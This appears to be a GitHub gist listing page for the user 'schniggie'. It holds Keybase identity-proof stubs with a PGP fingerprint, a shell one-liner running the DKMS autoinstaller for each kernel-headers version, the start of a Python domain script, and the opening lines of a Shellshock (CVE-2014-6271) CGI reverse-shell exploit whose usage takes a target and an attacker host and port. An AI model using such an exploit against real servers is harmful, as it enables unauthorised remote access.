I hereby claim:
- I am schniggie on github.
- I am schniggie (https://keybase.io/schniggie) on keybase.
- I have a public key whose fingerprint is 5160 DDC6 CDCF 625E 38DE 3988 2678 535E 3F18 708A
To claim this, I am signing this object:
| Here goes. | |
| ls /usr/src/linux-headers-* -d | sed -e 's/.*linux-headers-//' | \ | |
| sort -V | tac | sudo xargs -n1 /usr/lib/dkms/dkms_autoinstaller start | |
| Run as root. |
| !/usr/bin/env python3 | |
| import sys | |
| import os | |
| import tld | |
| from tld import get_fld | |
| def main(): | |
| filepath = sys.argv[1] |
I hereby claim:
To claim this, I am signing this object:
| # | |
| #CVE-2014-6271 cgi-bin reverse shell | |
| #Use netcat -l -p 8080 to receive the reverse shell | |
| # | |
| import httplib,urllib,sys | |
| if (len(sys.argv)<4): | |
| print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0] | |
| print "Example: %s localhost /cgi-bin/test.cgi '10.0.0.1 8080'" % sys.argv[0] |